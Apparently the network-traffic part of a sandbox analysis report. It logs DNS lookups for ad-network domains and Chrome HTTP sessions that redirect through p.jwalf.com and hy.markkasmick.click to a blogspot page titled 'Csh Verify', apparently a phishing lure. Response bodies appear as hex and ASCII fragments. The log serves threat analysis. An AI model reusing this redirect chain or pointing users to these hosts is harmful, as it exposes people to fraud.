                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.370580912 CEST1.1.1.1192.168.2.70x585cNo error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.440160036 CEST1.1.1.1192.168.2.70x8547No error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.440160036 CEST1.1.1.1192.168.2.70x8547No error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.440160036 CEST1.1.1.1192.168.2.70x8547No error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.440160036 CEST1.1.1.1192.168.2.70x8547No error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.440160036 CEST1.1.1.1192.168.2.70x8547No error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.440160036 CEST1.1.1.1192.168.2.70x8547No error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.440160036 CEST1.1.1.1192.168.2.70x8547No error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.440160036 CEST1.1.1.1192.168.2.70x8547No error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.440160036 CEST1.1.1.1192.168.2.70x8547No error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.440160036 CEST1.1.1.1192.168.2.70x8547No error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.440160036 CEST1.1.1.1192.168.2.70x8547No error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.440160036 CEST1.1.1.1192.168.2.70x8547No error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.440160036 CEST1.1.1.1192.168.2.70x8547No error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:16.931163073 CEST1.1.1.1192.168.2.70x6447No error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:16.931746006 CEST1.1.1.1192.168.2.70xf05No error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:16.931746006 CEST1.1.1.1192.168.2.70xf05No error (0)eu-eb2.3lift.com76.223.111.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:16.931746006 CEST1.1.1.1192.168.2.70xf05No error (0)eu-eb2.3lift.com13.248.245.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:17.388457060 CEST1.1.1.1192.168.2.70x2bceNo error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:17.388457060 CEST1.1.1.1192.168.2.70x2bceNo error (0)ib.anycast.adnxs.com37.252.171.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:17.388457060 CEST1.1.1.1192.168.2.70x2bceNo error (0)ib.anycast.adnxs.com37.252.171.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:17.388457060 CEST1.1.1.1192.168.2.70x2bceNo error (0)ib.anycast.adnxs.com37.252.171.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:17.388457060 CEST1.1.1.1192.168.2.70x2bceNo error (0)ib.anycast.adnxs.com37.252.173.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:17.388457060 CEST1.1.1.1192.168.2.70x2bceNo error (0)ib.anycast.adnxs.com37.252.171.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:17.388457060 CEST1.1.1.1192.168.2.70x2bceNo error (0)ib.anycast.adnxs.com37.252.172.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:17.388457060 CEST1.1.1.1192.168.2.70x2bceNo error (0)ib.anycast.adnxs.com37.252.171.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:19.912223101 CEST1.1.1.1192.168.2.70xf912No error (0)2500081.fs1.hubspotusercontent-na1.net104.18.41.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:19.912223101 CEST1.1.1.1192.168.2.70xf912No error (0)2500081.fs1.hubspotusercontent-na1.net172.64.146.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:19.913553953 CEST1.1.1.1192.168.2.70x13cNo error (0)2500081.fs1.hubspotusercontent-na1.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:21.966589928 CEST1.1.1.1192.168.2.70x50dNo error (0)2500081.fs1.hubspotusercontent-na1.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:21.968647003 CEST1.1.1.1192.168.2.70xf7ceNo error (0)2500081.fs1.hubspotusercontent-na1.net104.18.41.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:21.968647003 CEST1.1.1.1192.168.2.70xf7ceNo error (0)2500081.fs1.hubspotusercontent-na1.net172.64.146.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:31.315604925 CEST1.1.1.1192.168.2.70xa2c3No error (0)x.adroll.comeu-west-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:31.315604925 CEST1.1.1.1192.168.2.70xa2c3No error (0)eu-west-1-x.adroll.comsludge-sludge-production-624682132.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:31.315604925 CEST1.1.1.1192.168.2.70xa2c3No error (0)sludge-sludge-production-624682132.eu-west-1.elb.amazonaws.com54.72.14.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:31.315604925 CEST1.1.1.1192.168.2.70xa2c3No error (0)sludge-sludge-production-624682132.eu-west-1.elb.amazonaws.com34.251.125.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:31.315604925 CEST1.1.1.1192.168.2.70xa2c3No error (0)sludge-sludge-production-624682132.eu-west-1.elb.amazonaws.com63.33.18.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:31.316028118 CEST1.1.1.1192.168.2.70xf07fNo error (0)x.adroll.comeu-west-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:31.316028118 CEST1.1.1.1192.168.2.70xf07fNo error (0)eu-west-1-x.adroll.comsludge-sludge-production-624682132.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:32.003393888 CEST1.1.1.1192.168.2.70x5954No error (0)secure.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:32.003393888 CEST1.1.1.1192.168.2.70x5954No error (0)ib.anycast.adnxs.com37.252.171.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:32.003393888 CEST1.1.1.1192.168.2.70x5954No error (0)ib.anycast.adnxs.com37.252.172.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:32.003393888 CEST1.1.1.1192.168.2.70x5954No error (0)ib.anycast.adnxs.com37.252.171.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:32.003393888 CEST1.1.1.1192.168.2.70x5954No error (0)ib.anycast.adnxs.com37.252.171.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:32.003393888 CEST1.1.1.1192.168.2.70x5954No error (0)ib.anycast.adnxs.com37.252.171.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:32.003393888 CEST1.1.1.1192.168.2.70x5954No error (0)ib.anycast.adnxs.com37.252.171.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:32.003393888 CEST1.1.1.1192.168.2.70x5954No error (0)ib.anycast.adnxs.com37.252.173.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          0192.168.2.74971052.202.213.18802816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:25.459642887 CEST498OUTGET /ad/ad?p=198473&w=638192&d=7930e1d26d7336e03d98-1635872656638192&s=212257 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: p.jwalf.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:25.965473890 CEST195INHTTP/1.1 303 See Other
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:25 GMT
                                                                                                                                                                                                                                                                                                                                                                          Location: https://my7recovery.blogspot.com
                                                                                                                                                                                                                                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.128107071 CEST6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          1192.168.2.74971152.202.213.18802816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:10.469216108 CEST6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          0192.168.2.74970723.109.170.654432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:24 UTC1221OUTGET /cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_A HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: hy.markkasmick.click
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:24 UTC309INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:24 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Location: https://hy.markkasmick.click/imp/70341?param_3=nortb_over_ttl&nrb
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          1192.168.2.74970823.109.170.654432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:24 UTC699OUTGET /imp/70341?param_3=nortb_over_ttl&nrb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: hy.markkasmick.click
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:25 UTC1651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:25 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Accept-ch: sec-ch-ua-platform-version,sec-ch-ua-model,sec-ch-ua-full-version,sec-ch-ua-full-version-list
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: GL_UI4=eJw9jd1Og0AUhPmn1YJOwgP4CEBtiZfGh%2BglOeweKBZ2m2WF%2BPZuTPRqvky%2ByXieFxRP8Ndkj%2FCLTnip67oqBTXHrq%2Bor1nUTIKbV3o7Mx9PZ%2BzHpbXUTWwj7JaZjG3tGuEwsGIzilZoyRmenfXX3JTeVIS4M6Rkhnh2xpQh7YzeFjZFiEjRzEg%2Brka7jGf61AZhVTWOR%2BXYLxHopQjzB6SXUUk3zA8IqjLPEw%2BP94lsr83cjjLxEQ%2BGJMN%2Fx06Q5UGbb6SSl5vVd0BPsv33f3%2FDrSqRSF5H4c61vbL5AbYXTuA%3D; expires=Tue, 15-Oct-2024 09:12:25 GMT; Max-Age=86400; path=/; secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: GL_GI10=eJwNy0EKwjAQBdDMINVSFT72AD1BQCPivlvppnTRpbShhMIkJFHx9vr2TynF9R7sAqq7vt70%2BWK0MaAFPPTgSXAYxGU7N31%2BZptAEdyN4CjYdfbTjD6uoOlYghyq1kp%2Bxe%2FDyQqWhLL1Mfj4n6BQKHD22w04zbUCvYvTDwanHT8%3D; expires=Tue, 15-Oct-2024 09:12:25 GMT; Max-Age=86400; path=/; secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: cvn1=CwaAAAAAAhQBCgAI9SAGAQM%3D; expires=Fri, 13-Dec-2024 09:12:25 GMT; Max-Age=5184000; path=/; secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: GL_BC=eJxjYGBgEmEU5EiKN7UwNzAxEGHkSud5UMnGCAAoNAQc; expires=Tue, 15-Oct-2024 09:12:25 GMT; Max-Age=86400; path=/; secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: GL_CA_70341=eJxjYGBgEmHkYmB3cRNhEmRMZmMUZCzhSud5UAkAGmgDoQ%3D%3D; expires=Tue, 15-Oct-2024 09:12:25 GMT; Max-Age=86400; path=/; secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: GL_OC=eJxjYGBgEmEUZMmPN7MQYeRK53lQycYIABoNA1s%3D; expires=Tue, 15-Oct-2024 09:12:25 GMT; Max-Age=86400; path=/; secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:25 UTC682INData Raw: 32 39 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 2a 20 7b 20 62 6f 72 64 65 72 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 6f 75 74 6c 69 6e 65 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 7d 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 70 65 6e 65 72 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 27 7b 22 62 22 3a 35 38 37 30 34
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 29e<!doctype html><html><head> <meta charset="utf-8" /> <style>* { border: 0; margin: 0; outline: 0; padding: 0}</style> <title></title></head><body><script type="text/javascript"> try { window.opener.postMessage('{"b":58704


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          2192.168.2.749714142.250.185.974432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:26 UTC653OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: my7recovery.blogspot.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:27 UTC770INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: upgrade-insecure-requests
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: default-src https: blob: data: 'unsafe-inline' 'unsafe-eval'; report-to blogspot; report-uri https://www.blogger.com/cspreport
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"group":"blogspot","max_age":2592000,"endpoints":[{"url":"https://www.blogger.com/cspreport"}]}
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 14 Oct 2024 09:12:26 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:26 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Sat, 05 Oct 2024 02:05:09 GMT
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                          Server: GSE
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:27 UTC620INData Raw: 32 64 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 27 20 78 6d 6c 6e 73 3a 62 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 32 30 30 35 2f 67 6d 6c 2f 62 27 20 78 6d 6c 6e 73 3a 64 61 74 61 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 32 30 30 35 2f 67 6d 6c 2f 64 61 74 61 27 20 78 6d 6c 6e 73 3a 65 78 70 72 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 32 30 30 35 2f 67 6d 6c 2f 65 78 70 72 27 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 61 72 73 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 2d1d<!DOCTYPE html><html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'><head><script> //<![CDATA[var ars
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:27 UTC1390INData Raw: 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 20 7d 0a 2f 2f 5d 5d 3e 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 74 69 74 6c 65 3e 43 73 68 20 56 65 72 69 66 79 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 68 74 74 70 73 3a 2f 2f 62 6c 6f 67 67 65 72 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 69 6d 67 2f 62 2f 52 32 39 76 5a 32 78 6c 2f 41 56 76 58 73 45 6a 73 38 35 31 6b 4c 41 74 6d 6a 61 67 6f 33 70 43 6f 2d 43 46 48 48 53 6e 61 42
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: + encodeURIComponent(document.referrer) }//...</script><title>Csh Verify</title><meta content='width=device-width, initial-scale=1' name='viewport'/><meta content='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs851kLAtmjago3pCo-CFHHSnaB
